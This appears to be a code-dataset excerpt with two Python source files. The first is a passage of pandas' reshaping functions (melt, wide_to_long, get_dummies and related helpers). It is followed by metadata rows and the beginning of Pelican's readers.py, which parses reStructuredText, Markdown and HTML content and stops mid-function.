_convert_level_number(0, this.columns) this = this.sort_index(level=level_to_sort, axis=1) # tuple list excluding level for grouping columns if len(frame.columns.levels) > 2: tuples = list(zip(*[lev.take(lab) for lev, lab in zip(this.columns.levels[:-1], this.columns.labels[:-1])])) unique_groups = [key for key, _ in itertools.groupby(tuples)] new_names = this.columns.names[:-1] new_columns = MultiIndex.from_tuples(unique_groups, names=new_names) else: new_columns = unique_groups = this.columns.levels[0] # time to ravel the values new_data = {} level_vals = this.columns.levels[-1] level_labels = sorted(set(this.columns.labels[-1])) level_vals_used = level_vals[level_labels] levsize = len(level_labels) drop_cols = [] for key in unique_groups: loc = this.columns.get_loc(key) # can make more efficient? # we almost always return a slice # but if unsorted can get a boolean # indexer if not isinstance(loc, slice): slice_len = len(loc) else: slice_len = loc.stop - loc.start if slice_len == 0: drop_cols.append(key) continue elif slice_len != levsize: chunk = this.loc[:, this.columns[loc]] chunk.columns = level_vals.take(chunk.columns.labels[-1]) value_slice = chunk.reindex(columns=level_vals_used).values else: if frame._is_mixed_type: value_slice = this.loc[:, this.columns[loc]].values else: value_slice = this.values[:, loc] new_data[key] = value_slice.ravel() if len(drop_cols) > 0: new_columns = new_columns.difference(drop_cols) N = len(this) if isinstance(this.index, MultiIndex): new_levels = list(this.index.levels) new_names = list(this.index.names) new_labels = [lab.repeat(levsize) for lab in this.index.labels] else: new_levels = [this.index] new_labels = [np.arange(N).repeat(levsize)] new_names = [this.index.name] # something better? new_levels.append(level_vals) new_labels.append(np.tile(level_labels, N)) new_names.append(frame.columns.names[level_num]) new_index = MultiIndex(levels=new_levels, labels=new_labels, names=new_names, verify_integrity=False) result = DataFrame(new_data, index=new_index, columns=new_columns) # more efficient way to go about this? can do the whole masking biz but # will only save a small amount of time... if dropna: result = result.dropna(axis=0, how='all') return result @Appender(_shared_docs['melt'] % dict(caller='pd.melt(df, ', versionadded="", other='DataFrame.melt')) def melt(frame, id_vars=None, value_vars=None, var_name=None, value_name='value', col_level=None): # TODO: what about the existing index? if id_vars is not None: if not is_list_like(id_vars): id_vars = [id_vars] elif (isinstance(frame.columns, MultiIndex) and not isinstance(id_vars, list)): raise ValueError('id_vars must be a list of tuples when columns' ' are a MultiIndex') else: id_vars = list(id_vars) else: id_vars = [] if value_vars is not None: if not is_list_like(value_vars): value_vars = [value_vars] elif (isinstance(frame.columns, MultiIndex) and not isinstance(value_vars, list)): raise ValueError('value_vars must be a list of tuples when' ' columns are a MultiIndex') else: value_vars = list(value_vars) frame = frame.loc[:, id_vars + value_vars] else: frame = frame.copy() if col_level is not None: # allow list or other? # frame is a copy frame.columns = frame.columns.get_level_values(col_level) if var_name is None: if isinstance(frame.columns, MultiIndex): if len(frame.columns.names) == len(set(frame.columns.names)): var_name = frame.columns.names else: var_name = ['variable_%s' % i for i in range(len(frame.columns.names))] else: var_name = [frame.columns.name if frame.columns.name is not None else 'variable'] if isinstance(var_name, compat.string_types): var_name = [var_name] N, K = frame.shape K -= len(id_vars) mdata = {} for col in id_vars: mdata[col] = np.tile(frame.pop(col).values, K) mcolumns = id_vars + var_name + [value_name] mdata[value_name] = frame.values.ravel('F') for i, col in enumerate(var_name): # asanyarray will keep the columns as an Index mdata[col] = np.asanyarray(frame.columns ._get_level_values(i)).repeat(N) return DataFrame(mdata, columns=mcolumns) def lreshape(data, groups, dropna=True, label=None): """ Reshape long-format data to wide. Generalized inverse of DataFrame.pivot Parameters ---------- data : DataFrame groups : dict {new_name : list_of_columns} dropna : boolean, default True Examples -------- >>> import pandas as pd >>> data = pd.DataFrame({'hr1': [514, 573], 'hr2': [545, 526], ... 'team': ['Red Sox', 'Yankees'], ... 'year1': [2007, 2007], 'year2': [2008, 2008]}) >>> data hr1 hr2 team year1 year2 0 514 545 Red Sox 2007 2008 1 573 526 Yankees 2007 2008 >>> pd.lreshape(data, {'year': ['year1', 'year2'], 'hr': ['hr1', 'hr2']}) team year hr 0 Red Sox 2007 514 1 Yankees 2007 573 2 Red Sox 2008 545 3 Yankees 2008 526 Returns ------- reshaped : DataFrame """ if isinstance(groups, dict): keys = list(groups.keys()) values = list(groups.values()) else: keys, values = zip(*groups) all_cols = list(set.union(*[set(x) for x in values])) id_cols = list(data.columns.difference(all_cols)) K = len(values[0]) for seq in values: if len(seq) != K: raise ValueError('All column lists must be same length') mdata = {} pivot_cols = [] for target, names in zip(keys, values): to_concat = [data[col].values for col in names] mdata[target] = _concat._concat_compat(to_concat) pivot_cols.append(target) for col in id_cols: mdata[col] = np.tile(data[col].values, K) if dropna: mask = np.ones(len(mdata[pivot_cols[0]]), dtype=bool) for c in pivot_cols: mask &= notna(mdata[c]) if not mask.all(): mdata = dict((k, v[mask]) for k, v in compat.iteritems(mdata)) return DataFrame(mdata, columns=id_cols + pivot_cols) def wide_to_long(df, stubnames, i, j, sep="", suffix='\d+'): r""" Wide panel to long format. Less flexible but more user-friendly than melt. With stubnames ['A', 'B'], this function expects to find one or more group of columns with format Asuffix1, Asuffix2,..., Bsuffix1, Bsuffix2,... You specify what you want to call this suffix in the resulting long format with `j` (for example `j='year'`) Each row of these wide variables are assumed to be uniquely identified by `i` (can be a single column name or a list of column names) All remaining variables in the data frame are left intact. Parameters ---------- df : DataFrame The wide-format DataFrame stubnames : str or list-like The stub name(s). The wide format variables are assumed to start with the stub names. i : str or list-like Column(s) to use as id variable(s) j : str The name of the subobservation variable. What you wish to name your suffix in the long format. sep : str, default "" A character indicating the separation of the variable names in the wide format, to be stripped from the names in the long format. For example, if your column names are A-suffix1, A-suffix2, you can strip the hypen by specifying `sep='-'` .. versionadded:: 0.20.0 suffix : str, default '\\d+' A regular expression capturing the wanted suffixes. '\\d+' captures numeric suffixes. Suffixes with no numbers could be specified with the negated character class '\\D+'. You can also further disambiguate suffixes, for example, if your wide variables are of the form Aone, Btwo,.., and you have an unrelated column Arating, you can ignore the last one by specifying `suffix='(!?one|two)'` .. versionadded:: 0.20.0 Returns ------- DataFrame A DataFrame that contains each stub name as a variable, with new index (i, j) Examples -------- >>> import pandas as pd >>> import numpy as np >>> np.random.seed(123) >>> df = pd.DataFrame({"A1970" : {0 : "a", 1 : "b", 2 : "c"}, ... "A1980" : {0 : "d", 1 : "e", 2 : "f"}, ... "B1970" : {0 : 2.5, 1 : 1.2, 2 : .7}, ... "B1980" : {0 : 3.2, 1 : 1.3, 2 : .1}, ... "X" : dict(zip(range(3), np.random.randn(3))) ... }) >>> df["id"] = df.index >>> df A1970 A1980 B1970 B1980 X id 0 a d 2.5 3.2 -1.085631 0 1 b e 1.2 1.3 0.997345 1 2 c f 0.7 0.1 0.282978 2 >>> pd.wide_to_long(df, ["A", "B"], i="id", j="year") ... # doctest: +NORMALIZE_WHITESPACE X A B id year 0 1970 -1.085631 a 2.5 1 1970 0.997345 b 1.2 2 1970 0.282978 c 0.7 0 1980 -1.085631 d 3.2 1 1980 0.997345 e 1.3 2 1980 0.282978 f 0.1 With multuple id columns >>> df = pd.DataFrame({ ... 'famid': [1, 1, 1, 2, 2, 2, 3, 3, 3], ... 'birth': [1, 2, 3, 1, 2, 3, 1, 2, 3], ... 'ht1': [2.8, 2.9, 2.2, 2, 1.8, 1.9, 2.2, 2.3, 2.1], ... 'ht2': [3.4, 3.8, 2.9, 3.2, 2.8, 2.4, 3.3, 3.4, 2.9] ... }) >>> df birth famid ht1 ht2 0 1 1 2.8 3.4 1 2 1 2.9 3.8 2 3 1 2.2 2.9 3 1 2 2.0 3.2 4 2 2 1.8 2.8 5 3 2 1.9 2.4 6 1 3 2.2 3.3 7 2 3 2.3 3.4 8 3 3 2.1 2.9 >>> l = pd.wide_to_long(df, stubnames='ht', i=['famid', 'birth'], j='age') >>> l ... # doctest: +NORMALIZE_WHITESPACE ht famid birth age 1 1 1 2.8 2 3.4 2 1 2.9 2 3.8 3 1 2.2 2 2.9 2 1 1 2.0 2 3.2 2 1 1.8 2 2.8 3 1 1.9 2 2.4 3 1 1 2.2 2 3.3 2 1 2.3 2 3.4 3 1 2.1 2 2.9 Going from long back to wide just takes some creative use of `unstack` >>> w = l.reset_index().set_index(['famid', 'birth', 'age']).unstack() >>> w.columns = pd.Index(w.columns).str.join('') >>> w.reset_index() famid birth ht1 ht2 0 1 1 2.8 3.4 1 1 2 2.9 3.8 2 1 3 2.2 2.9 3 2 1 2.0 3.2 4 2 2 1.8 2.8 5 2 3 1.9 2.4 6 3 1 2.2 3.3 7 3 2 2.3 3.4 8 3 3 2.1 2.9 Less wieldy column names are also handled >>> np.random.seed(0) >>> df = pd.DataFrame({'A(quarterly)-2010': np.random.rand(3), ... 'A(quarterly)-2011': np.random.rand(3), ... 'B(quarterly)-2010': np.random.rand(3), ... 'B(quarterly)-2011': np.random.rand(3), ... 'X' : np.random.randint(3, size=3)}) >>> df['id'] = df.index >>> df # doctest: +NORMALIZE_WHITESPACE, +ELLIPSIS A(quarterly)-2010 A(quarterly)-2011 B(quarterly)-2010 ... 0 0.548814 0.544883 0.437587 ... 1 0.715189 0.423655 0.891773 ... 2 0.602763 0.645894 0.963663 ... X id 0 0 0 1 1 1 2 1 2 >>> pd.wide_to_long(df, ['A(quarterly)', 'B(quarterly)'], i='id', ... j='year', sep='-') ... # doctest: +NORMALIZE_WHITESPACE X A(quarterly) B(quarterly) id year 0 2010 0 0.548814 0.437587 1 2010 1 0.715189 0.891773 2 2010 1 0.602763 0.963663 0 2011 0 0.544883 0.383442 1 2011 1 0.423655 0.791725 2 2011 1 0.645894 0.528895 If we have many columns, we could also use a regex to find our stubnames and pass that list on to wide_to_long >>> stubnames = sorted( ... set([match[0] for match in df.columns.str.findall( ... r'[A-B]\(.*\)').values if match != [] ]) ... ) >>> list(stubnames) ['A(quarterly)', 'B(quarterly)'] Notes ----- All extra variables are left untouched. This simply uses `pandas.melt` under the hood, but is hard-coded to "do the right thing" in a typicaly case. """ def get_var_names(df, stub, sep, suffix): regex = "^{0}{1}{2}".format(re.escape(stub), re.escape(sep), suffix) return df.filter(regex=regex).columns.tolist() def melt_stub(df, stub, i, j, value_vars, sep): newdf = melt(df, id_vars=i, value_vars=value_vars, value_name=stub.rstrip(sep), var_name=j) newdf[j] = Categorical(newdf[j]) newdf[j] = newdf[j].str.replace(re.escape(stub + sep), "") return newdf.set_index(i + [j]) if any(map(lambda s: s in df.columns.tolist(), stubnames)): raise ValueError("stubname can't be identical to a column name") if not is_list_like(stubnames): stubnames = [stubnames] else: stubnames = list(stubnames) if not is_list_like(i): i = [i] else: i = list(i) if df[i].duplicated().any(): raise ValueError("the id variables need to uniquely identify each row") value_vars = list(map(lambda stub: get_var_names(df, stub, sep, suffix), stubnames)) value_vars_flattened = [e for sublist in value_vars for e in sublist] id_vars = list(set(df.columns.tolist()).difference(value_vars_flattened)) melted = [] for s, v in zip(stubnames, value_vars): melted.append(melt_stub(df, s, i, j, v, sep)) melted = melted[0].join(melted[1:], how='outer') if len(i) == 1: new = df[id_vars].set_index(i).join(melted) return new new = df[id_vars].merge(melted.reset_index(), on=i).set_index(i + [j]) return new def get_dummies(data, prefix=None, prefix_sep='_', dummy_na=False, columns=None, sparse=False, drop_first=False): """ Convert categorical variable into dummy/indicator variables Parameters ---------- data : array-like, Series, or DataFrame prefix : string, list of strings, or dict of strings, default None String to append DataFrame column names Pass a list with length equal to the number of columns when calling get_dummies on a DataFrame. Alternativly, `prefix` can be a dictionary mapping column names to prefixes. prefix_sep : string, default '_' If appending prefix, separator/delimiter to use. Or pass a list or dictionary as with `prefix.` dummy_na : bool, default False Add a column to indicate NaNs, if False NaNs are ignored. columns : list-like, default None Column names in the DataFrame to be encoded. If `columns` is None then all the columns with `object` or `category` dtype will be converted. sparse : bool, default False Whether the dummy columns should be sparse or not. Returns SparseDataFrame if `data` is a Series or if all columns are included. Otherwise returns a DataFrame with some SparseBlocks. .. versionadded:: 0.16.1 drop_first : bool, default False Whether to get k-1 dummies out of k categorical levels by removing the first level. .. versionadded:: 0.18.0 Returns ------- dummies : DataFrame or SparseDataFrame Examples -------- >>> import pandas as pd >>> s = pd.Series(list('abca')) >>> pd.get_dummies(s) a b c 0 1 0 0 1 0 1 0 2 0 0 1 3 1 0 0 >>> s1 = ['a', 'b', np.nan] >>> pd.get_dummies(s1) a b 0 1 0 1 0 1 2 0 0 >>> pd.get_dummies(s1, dummy_na=True) a b NaN 0 1 0 0 1 0 1 0 2 0 0 1 >>> df = pd.DataFrame({'A': ['a', 'b', 'a'], 'B': ['b', 'a', 'c'], ... 'C': [1, 2, 3]}) >>> pd.get_dummies(df, prefix=['col1', 'col2']) C col1_a col1_b col2_a col2_b col2_c 0 1 1 0 0 1 0 1 2 0 1 1 0 0 2 3 1 0 0 0 1 >>> pd.get_dummies(pd.Series(list('abcaa'))) a b c 0 1 0 0 1 0 1 0 2 0 0 1 3 1 0 0 4 1 0 0 >>> pd.get_dummies(pd.Series(list('abcaa')), drop_first=True) b c 0 0 0 1 1 0 2 0 1 3 0 0 4 0 0 See Also -------- Series.str.get_dummies """ from pandas.core.reshape.concat import concat from itertools import cycle if isinstance(data, DataFrame): # determine columns being encoded if columns is None: columns_to_encode = data.select_dtypes( include=['object', 'category']).columns else: columns_to_encode = columns # validate prefixes and separator to avoid silently dropping cols def check_len(item, name): length_msg = ("Length of '{0}' ({1}) did not match the length of " "the columns being encoded ({2}).") if is_list_like(item): if not len(item) == len(columns_to_encode): raise ValueError(length_msg.format(name, len(item), len(columns_to_encode))) check_len(prefix, 'prefix') check_len(prefix_sep, 'prefix_sep') if isinstance(prefix, compat.string_types): prefix = cycle([prefix]) if isinstance(prefix, dict): prefix = [prefix[col] for col in columns_to_encode] if prefix is None: prefix = columns_to_encode # validate separators if isinstance(prefix_sep, compat.string_types): prefix_sep = cycle([prefix_sep]) elif isinstance(prefix_sep, dict): prefix_sep = [prefix_sep[col] for col in columns_to_encode] if set(columns_to_encode) == set(data.columns): with_dummies = [] else: with_dummies = [data.drop(columns_to_encode, axis=1)] for (col, pre, sep) in zip(columns_to_encode, prefix, prefix_sep): dummy = _get_dummies_1d(data[col], prefix=pre, prefix_sep=sep, dummy_na=dummy_na, sparse=sparse, drop_first=drop_first) with_dummies.append(dummy) result = concat(with_dummies, axis=1) else: result = _get_dummies_1d(data, prefix, prefix_sep, dummy_na, sparse=sparse, drop_first=drop_first) return result def _get_dummies_1d(data, prefix, prefix_sep='_', dummy_na=False, sparse=False, drop_first=False): # Series avoids inconsistent NaN handling codes, levels = _factorize_from_iterable(Series(data)) def get_empty_Frame(data, sparse): if isinstance(data, Series): index = data.index else: index = np.arange(len(data)) if not sparse: return DataFrame(index=index) else: return SparseDataFrame(index=index, default_fill_value=0) # if all NaN if not dummy_na and len(levels) == 0: return get_empty_Frame(data, sparse) codes = codes.copy() if dummy_na: codes[codes == -1] = len(levels) levels = np.append(levels, np.nan) # if dummy_na, we just fake a nan level. drop_first will drop it again if drop_first and len(levels) == 1: return get_empty_Frame(data, sparse) number_of_cols = len(levels) if prefix is not None: dummy_cols = ['%s%s%s' % (prefix, prefix_sep, v) for v in levels] else: dummy_cols = levels if isinstance(data, Series): index = data.index else: index = None if sparse: sparse_series = {} N = len(data) sp_indices = [[] for _ in range(len(dummy_cols))] for ndx, code in enumerate(codes): if code == -1: # Blank entries if not dummy_na and code == -1, #GH4446 continue sp_indices[code].append(ndx) if drop_first: # remove first categorical level to avoid perfect collinearity # GH12042 sp_indices = sp_indices[1:] dummy_cols = dummy_cols[1:] for col, ixs in zip(dummy_cols, sp_indices): sarr = SparseArray(np.ones(len(ixs), dtype=np.uint8), sparse_index=IntIndex(N, ixs), fill_value=0, dtype=np.uint8) sparse_series[col] = SparseSeries(data=sarr, index=index) out = SparseDataFrame(sparse_series, index=index, columns=dummy_cols, default_fill_value=0, dtype=np.uint8) return out else: dummy_mat = np.eye(number_of_cols, dtype=np.uint8).take(codes, axis=0) if not dummy_na: # reset NaN GH4446 dummy_mat[codes == -1] = 0 if drop_first: # remove first GH12042 dummy_mat = dummy_mat[:, 1:] dummy_cols = dummy_cols[1:] return DataFrame(dummy_mat, index=index, columns=dummy_cols) def make_axis_dummies(frame, axis='minor', transform=None): """ Construct 1-0 dummy variables corresponding to designated axis labels Parameters ---------- frame : DataFrame axis : {'major', 'minor'}, default 'minor' transform : function, default None Function to apply to axis labels first. For example, to get "day of week" dummies in a time series regression you might call:: make_axis_dummies(panel, axis='major', transform=lambda d: d.weekday()) Returns ------- dummies : DataFrame Column names taken from chosen axis """ numbers = {'major': 0, 'minor': 1} num = numbers.get(axis, axis) items = frame.index.levels[num] labels = frame.index.labels[num] if transform is not None: mapped_items = items.map(transform) labels, items = _factorize_from_iterable(mapped_items.take(labels)) values = np.eye(len(items), dtype=float) values = values.take(labels, axis=0) return DataFrame(values, columns=items, index=frame.index)
gpl-2.0
8,329,274,033,396,292,000
33.239163
79
0.56005
false
3.675546
false
false
false
zackw/pelican
pelican/readers.py
1
25554
# -*- coding: utf-8 -*- from __future__ import print_function, unicode_literals import logging import os import re from collections import OrderedDict import docutils import docutils.core import docutils.io from docutils.writers.html4css1 import HTMLTranslator, Writer import six from six.moves.html_parser import HTMLParser from pelican import rstdirectives # NOQA from pelican import signals from pelican.cache import FileStampDataCacher from pelican.contents import Author, Category, Page, Tag from pelican.utils import SafeDatetime, escape_html, get_date, pelican_open, \ posixize_path try: from markdown import Markdown except ImportError: Markdown = False # NOQA # Metadata processors have no way to discard an unwanted value, so we have # them return this value instead to signal that it should be discarded later. # This means that _filter_discardable_metadata() must be called on processed # metadata dicts before use, to remove the items with the special value. _DISCARD = object() METADATA_PROCESSORS = { 'tags': lambda x, y: ([ Tag(tag, y) for tag in ensure_metadata_list(x) ] or _DISCARD), 'date': lambda x, y: get_date(x.replace('_', ' ')), 'modified': lambda x, y: get_date(x), 'status': lambda x, y: x.strip() or _DISCARD, 'category': lambda x, y: _process_if_nonempty(Category, x, y), 'author': lambda x, y: _process_if_nonempty(Author, x, y), 'authors': lambda x, y: ([ Author(author, y) for author in ensure_metadata_list(x) ] or _DISCARD), 'slug': lambda x, y: x.strip() or _DISCARD, } logger = logging.getLogger(__name__) def ensure_metadata_list(text): """Canonicalize the format of a list of authors or tags. This works the same way as Docutils' "authors" field: if it's already a list, those boundaries are preserved; otherwise, it must be a string; if the string contains semicolons, it is split on semicolons; otherwise, it is split on commas. This allows you to write author lists in either "Jane Doe, John Doe" or "Doe, Jane; Doe, John" format. Regardless, all list items undergo .strip() before returning, and empty items are discarded. """ if isinstance(text, six.text_type): if ';' in text: text = text.split(';') else: text = text.split(',') return list(OrderedDict.fromkeys( [v for v in (w.strip() for w in text) if v] )) def _process_if_nonempty(processor, name, settings): """Removes extra whitespace from name and applies a metadata processor. If name is empty or all whitespace, returns _DISCARD instead. """ name = name.strip() return processor(name, settings) if name else _DISCARD def _filter_discardable_metadata(metadata): """Return a copy of a dict, minus any items marked as discardable.""" return {name: val for name, val in metadata.items() if val is not _DISCARD} class BaseReader(object): """Base class to read files. This class is used to process static files, and it can be inherited for other types of file. A Reader class must have the following attributes: - enabled: (boolean) tell if the Reader class is enabled. It generally depends on the import of some dependency. - file_extensions: a list of file extensions that the Reader will process. - extensions: a list of extensions to use in the reader (typical use is Markdown). """ enabled = True file_extensions = ['static'] extensions = None def __init__(self, settings): self.settings = settings def process_metadata(self, name, value): if name in METADATA_PROCESSORS: return METADATA_PROCESSORS[name](value, self.settings) return value def read(self, source_path): "No-op parser" content = None metadata = {} return content, metadata class _FieldBodyTranslator(HTMLTranslator): def __init__(self, document): HTMLTranslator.__init__(self, document) self.compact_p = None def astext(self): return ''.join(self.body) def visit_field_body(self, node): pass def depart_field_body(self, node): pass def render_node_to_html(document, node, field_body_translator_class): visitor = field_body_translator_class(document) node.walkabout(visitor) return visitor.astext() class PelicanHTMLWriter(Writer): def __init__(self): Writer.__init__(self) self.translator_class = PelicanHTMLTranslator class PelicanHTMLTranslator(HTMLTranslator): def visit_abbreviation(self, node): attrs = {} if node.hasattr('explanation'): attrs['title'] = node['explanation'] self.body.append(self.starttag(node, 'abbr', '', **attrs)) def depart_abbreviation(self, node): self.body.append('</abbr>') def visit_image(self, node): # set an empty alt if alt is not specified # avoids that alt is taken from src node['alt'] = node.get('alt', '') return HTMLTranslator.visit_image(self, node) class RstReader(BaseReader): """Reader for reStructuredText files By default the output HTML is written using docutils.writers.html4css1.Writer and translated using a subclass of docutils.writers.html4css1.HTMLTranslator. If you want to override it with your own writer/translator (e.g. a HTML5-based one), pass your classes to these two attributes. Look in the source code for details. writer_class Used for writing contents field_body_translator_class Used for translating metadata such as article summary """ enabled = bool(docutils) file_extensions = ['rst'] writer_class = PelicanHTMLWriter field_body_translator_class = _FieldBodyTranslator class FileInput(docutils.io.FileInput): """Patch docutils.io.FileInput to remove "U" mode in py3. Universal newlines is enabled by default and "U" mode is deprecated in py3. """ def __init__(self, *args, **kwargs): if six.PY3: kwargs['mode'] = kwargs.get('mode', 'r').replace('U', '') docutils.io.FileInput.__init__(self, *args, **kwargs) def __init__(self, *args, **kwargs): super(RstReader, self).__init__(*args, **kwargs) def _parse_metadata(self, document): """Return the dict containing document metadata""" formatted_fields = self.settings['FORMATTED_FIELDS'] output = {} for docinfo in document.traverse(docutils.nodes.docinfo): for element in docinfo.children: if element.tagname == 'field': # custom fields (e.g. summary) name_elem, body_elem = element.children name = name_elem.astext() if name in formatted_fields: value = render_node_to_html( document, body_elem, self.field_body_translator_class) else: value = body_elem.astext() elif element.tagname == 'authors': # author list name = element.tagname value = [element.astext() for element in element.children] else: # standard fields (e.g. address) name = element.tagname value = element.astext() name = name.lower() output[name] = self.process_metadata(name, value) return output def _get_publisher(self, source_path): extra_params = {'initial_header_level': '2', 'syntax_highlight': 'short', 'input_encoding': 'utf-8', 'exit_status_level': 2, 'embed_stylesheet': False} user_params = self.settings.get('DOCUTILS_SETTINGS') if user_params: extra_params.update(user_params) pub = docutils.core.Publisher( writer=self.writer_class(), source_class=self.FileInput, destination_class=docutils.io.StringOutput) pub.set_components('standalone', 'restructuredtext', 'html') pub.process_programmatic_settings(None, extra_params, None) pub.set_source(source_path=source_path) pub.publish(enable_exit_status=True) return pub def read(self, source_path): """Parses restructured text""" pub = self._get_publisher(source_path) parts = pub.writer.parts content = parts.get('body') metadata = self._parse_metadata(pub.document) metadata.setdefault('title', parts.get('title')) return content, metadata class MarkdownReader(BaseReader): """Reader for Markdown files""" enabled = bool(Markdown) file_extensions = ['md', 'markdown', 'mkd', 'mdown'] def __init__(self, *args, **kwargs): super(MarkdownReader, self).__init__(*args, **kwargs) settings = self.settings['MARKDOWN'] settings.setdefault('extension_configs', {}) settings.setdefault('extensions', []) for extension in settings['extension_configs'].keys(): if extension not in settings['extensions']: settings['extensions'].append(extension) if 'markdown.extensions.meta' not in settings['extensions']: settings['extensions'].append('markdown.extensions.meta') self._source_path = None def _parse_metadata(self, meta): """Return the dict containing document metadata""" formatted_fields = self.settings['FORMATTED_FIELDS'] output = {} for name, value in meta.items(): name = name.lower() if name in formatted_fields: # formatted metadata is special case and join all list values formatted_values = "\n".join(value) # reset the markdown instance to clear any state self._md.reset() formatted = self._md.convert(formatted_values) output[name] = self.process_metadata(name, formatted) elif name in METADATA_PROCESSORS: if len(value) > 1: logger.warning( 'Duplicate definition of `%s` ' 'for %s. Using first one.', name, self._source_path) output[name] = self.process_metadata(name, value[0]) elif len(value) > 1: # handle list metadata as list of string output[name] = self.process_metadata(name, value) else: # otherwise, handle metadata as single string output[name] = self.process_metadata(name, value[0]) return output def read(self, source_path): """Parse content and metadata of markdown files""" self._source_path = source_path self._md = Markdown(**self.settings['MARKDOWN']) with pelican_open(source_path) as text: content = self._md.convert(text) if hasattr(self._md, 'Meta'): metadata = self._parse_metadata(self._md.Meta) else: metadata = {} return content, metadata class HTMLReader(BaseReader): """Parses HTML files as input, looking for meta, title, and body tags""" file_extensions = ['htm', 'html'] enabled = True class _HTMLParser(HTMLParser): def __init__(self, settings, filename): try: # Python 3.4+ HTMLParser.__init__(self, convert_charrefs=False) except TypeError: HTMLParser.__init__(self) self.body = '' self.metadata = {} self.settings = settings self._data_buffer = '' self._filename = filename self._in_top_level = True self._in_head = False self._in_title = False self._in_body = False self._in_tags = False def handle_starttag(self, tag, attrs): if tag == 'head' and self._in_top_level: self._in_top_level = False self._in_head = True elif tag == 'title' and self._in_head: self._in_title = True self._data_buffer = '' elif tag == 'body' and self._in_top_level: self._in_top_level = False self._in_body = True self._data_buffer = '' elif tag == 'meta' and self._in_head: self._handle_meta_tag(attrs) elif self._in_body: self._data_buffer += self.build_tag(tag, attrs, False) def handle_endtag(self, tag): if tag == 'head': if self._in_head: self._in_head = False self._in_top_level = True elif tag == 'title': self._in_title = False self.metadata['title'] = self._data_buffer elif tag == 'body': self.body = self._data_buffer self._in_body = False self._in_top_level = True elif self._in_body: self._data_buffer += '</{}>'.format(escape_html(tag)) def handle_startendtag(self, tag, attrs): if tag == 'meta' and self._in_head: self._handle_meta_tag(attrs) if self._in_body: self._data_buffer += self.build_tag(tag, attrs, True) def handle_comment(self, data): self._data_buffer += '<!--{}-->'.format(data) def handle_data(self, data): self._data_buffer += data def handle_entityref(self, data): self._data_buffer += '&{};'.format(data) def handle_charref(self, data): self._data_buffer += '&#{};'.format(data) def build_tag(self, tag, attrs, close_tag): result = '<{}'.format(escape_html(tag)) for k, v in attrs: result += ' ' + escape_html(k) if v is not None: # If the attribute value contains a double quote, surround # with single quotes, otherwise use double quotes. if '"' in v: result += "='{}'".format(escape_html(v, quote=False)) else: result += '="{}"'.format(escape_html(v, quote=False)) if close_tag: return result + ' />' return result + '>' def _handle_meta_tag(self, attrs): name = self._attr_value(attrs, 'name') if name is None: attr_list = ['{}="{}"'.format(k, v) for k, v in attrs] attr_serialized = ', '.join(attr_list) logger.warning("Meta tag in file %s does not have a 'name' " "attribute, skipping. Attributes: %s", self._filename, attr_serialized) return name = name.lower() contents = self._attr_value(attrs, 'content', '') if not contents: contents = self._attr_value(attrs, 'contents', '') if contents: logger.warning( "Meta tag attribute 'contents' used in file %s, should" " be changed to 'content'", self._filename, extra={'limit_msg': "Other files have meta tag " "attribute 'contents' that should " "be changed to 'content'"}) if name == 'keywords': name = 'tags' self.metadata[name] = contents @classmethod def _attr_value(cls, attrs, name, default=None): return next((x[1] for x in attrs if x[0] == name), default) def read(self, filename): """Parse content and metadata of HTML files""" with pelican_open(filename) as content: parser = self._HTMLParser(self.settings, filename) parser.feed(content) parser.close() metadata = {} for k in parser.metadata: metadata[k] = self.process_metadata(k, parser.metadata[k]) return parser.body, metadata class Readers(FileStampDataCacher): """Interface for all readers. This class contains a mapping of file extensions / Reader classes, to know which Reader class must be used to read a file (based on its extension). This is customizable both with the 'READERS' setting, and with the 'readers_init' signall for plugins. """ def __init__(self, settings=None, cache_name=''): self.settings = settings or {} self.readers = {} self.reader_classes = {} for cls in [BaseReader] + BaseReader.__subclasses__(): if not cls.enabled: logger.debug('Missing dependencies for %s', ', '.join(cls.file_extensions)) continue for ext in cls.file_extensions: self.reader_classes[ext] = cls if self.settings['READERS']: self.reader_classes.update(self.settings['READERS']) signals.readers_init.send(self) for fmt, reader_class in self.reader_classes.items(): if not reader_class: continue self.readers[fmt] = reader_class(self.settings) # set up caching cache_this_level = (cache_name != '' and self.settings['CONTENT_CACHING_LAYER'] == 'reader') caching_policy = cache_this_level and self.settings['CACHE_CONTENT'] load_policy = cache_this_level and self.settings['LOAD_CONTENT_CACHE'] super(Readers, self).__init__(settings, cache_name, caching_policy, load_policy, ) @property def extensions(self): return self.readers.keys() def read_file(self, base_path, path, content_class=Page, fmt=None, context=None, preread_signal=None, preread_sender=None, context_signal=None, context_sender=None): """Return a content object parsed with the given format.""" path = os.path.abspath(os.path.join(base_path, path)) source_path = posixize_path(os.path.relpath(path, base_path)) logger.debug( 'Read file %s -> %s', source_path, content_class.__name__) if not fmt: _, ext = os.path.splitext(os.path.basename(path)) fmt = ext[1:] if fmt not in self.readers: raise TypeError( 'Pelican does not know how to parse %s', path) if preread_signal: logger.debug( 'Signal %s.send(%s)', preread_signal.name, preread_sender) preread_signal.send(preread_sender) reader = self.readers[fmt] metadata = _filter_discardable_metadata(default_metadata( settings=self.settings, process=reader.process_metadata)) metadata.update(path_metadata( full_path=path, source_path=source_path, settings=self.settings)) metadata.update(_filter_discardable_metadata(parse_path_metadata( source_path=source_path, settings=self.settings, process=reader.process_metadata))) reader_name = reader.__class__.__name__ metadata['reader'] = reader_name.replace('Reader', '').lower() content, reader_metadata = self.get_cached_data(path, (None, None)) if content is None: content, reader_metadata = reader.read(path) self.cache_data(path, (content, reader_metadata)) metadata.update(_filter_discardable_metadata(reader_metadata)) if content: # find images with empty alt find_empty_alt(content, path) # eventually filter the content with typogrify if asked so if self.settings['TYPOGRIFY']: from typogrify.filters import typogrify import smartypants # Tell `smartypants` to also replace &quot; HTML entities with # smart quotes. This is necessary because Docutils has already # replaced double quotes with said entities by the time we run # this filter. smartypants.Attr.default |= smartypants.Attr.w def typogrify_wrapper(text): """Ensures ignore_tags feature is backward compatible""" try: return typogrify( text, self.settings['TYPOGRIFY_IGNORE_TAGS']) except TypeError: return typogrify(text) if content: content = typogrify_wrapper(content) if 'title' in metadata: metadata['title'] = typogrify_wrapper(metadata['title']) if 'summary' in metadata: metadata['summary'] = typogrify_wrapper(metadata['summary']) if context_signal: logger.debug( 'Signal %s.send(%s, <metadata>)', context_signal.name, context_sender) context_signal.send(context_sender, metadata=metadata) return content_class(content=content, metadata=metadata, settings=self.settings, source_path=path, context=context) def find_empty_alt(content, path): """Find images with empty alt Create warnings for all images with empty alt (up to a certain number), as they are really likely to be accessibility flaws. """ imgs = re.compile(r""" (?: # src before alt <img [^\>]* src=(['"])(.*?)\1 [^\>]* 